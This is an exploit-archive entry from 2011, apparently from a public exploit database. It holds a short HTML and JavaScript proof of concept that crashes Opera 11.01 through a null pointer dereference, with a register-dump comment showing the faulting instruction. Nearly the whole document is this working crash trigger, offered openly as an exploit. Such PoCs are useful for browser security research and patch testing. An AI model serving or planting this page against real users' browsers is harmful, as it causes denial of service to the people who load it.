Opera 11.01 NULL PTR Derefernce

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Opera 11.01 NULL PTR Derefernce
# Published : 2011-03-15
# Author : echo
# Previous Title : Fake Webcam v 6.1 Local Crash PoC
# Next Title : Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit

<html>
  <head>
  <title>Opera 11.01 Null Ptr Derefer</title>
  </head>
  <body>
   <script type="text/JavaScript" language="JavaScript">
   
    /*
    * [+]. Title : Opera 11.01 Null Pointer Derefernce 
    * [+]. Date : 15.03.2011 05:18
    * [+]. Author: echo
    * [+]. Version: 11.01
    * [+]. Software link: http://www.opera.com/download/
    * [+]. Tested on : Win32 xp home sp 2
    * [+]. CVE : NULL    
    * ---------------------------------------
    * 675B5646  MOV ECX,DWORD PTR DS:[EDI+8]   
    * DS:[00000008]=???
    * ECX=00000000   
    * EDI=00000000                    
    */
    var iWin  = window.open();
    var iShit = iWin.document.createElement("ANY");
        iWin.document.body.appendChild(iShit);
        iWin.close();
        iWin.document.cloneNode("HiH");  
        
   </script>
  </body>
</html>